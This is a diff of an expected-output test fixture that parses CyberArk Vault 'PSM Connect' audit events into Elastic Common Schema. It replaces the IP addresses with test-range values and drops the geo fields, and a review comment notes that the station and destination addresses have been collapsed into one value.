Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:37\",\"IsoTimestamp\":\"2021-03-14T13:49:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM 
Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331173800Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n 
\u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:37\",\"IsoTimestamp\":\"2021-03-14T13:49:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", 
@@ -950,39 +874,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -999,7 +902,7 @@ }, "@timestamp": "2021-03-14T13:50:43.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -1010,16 +913,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:50:43Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:50:43\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:50:43Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:50:43\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:50:43Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n 
\u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { 
@@ -1031,13 +933,13 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "47747796-03e1-4a11-af39-ab56c00e7732", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1049,9 +951,9 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 14 06:50:43", "desc": "PSM Connect" 
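Review bot: In the `@@ -1049,9 +951,9 @@` hunk `station` now takes the same value as `dst_host` in the hunk above it (`67.43.156.15`), whereas the old fixture kept them distinct (`34.71.250.247` vs `34.123.103.115`). With the two fields collapsed, this expected output can no longer tell whether the pipeline filled `destination.ip` from `DstHost` or from `Station`, and `related.ip` shrinks from three entries to two as a consequence in the `@@ -1146,16 +1027,15 @@` and `@@ -1280,16 +1139,15 @@` hunks below. The same collapse recurs for the other two events in `@@ -1183,9 +1063,9 @@` and `@@ -1317,9 +1175,9 @@`. If this file is regenerated expected output, as the updated `ingested` timestamps suggest, the fix belongs in the raw test events rather than here: give `Station` a third distinct address from the permitted test range and regenerate, so `destination.ip`, `station` and the third `related.ip` entry stay separately verifiable.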
@@ -1062,8 +964,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936285100Z", - "original": "\u003c5\u003e1 2021-03-14T13:50:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:50:43\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:50:43Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:50:43\",\"IsoTimestamp\":\"2021-03-14T13:50:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM 
Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331178100Z", + "original": "\u003c5\u003e1 2021-03-14T13:50:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:50:43\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:50:43Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n 
\u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:50:43\",\"IsoTimestamp\":\"2021-03-14T13:50:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", 
@@ -1086,39 +988,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1135,7 +1016,7 @@ }, "@timestamp": "2021-03-15T10:31:56.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
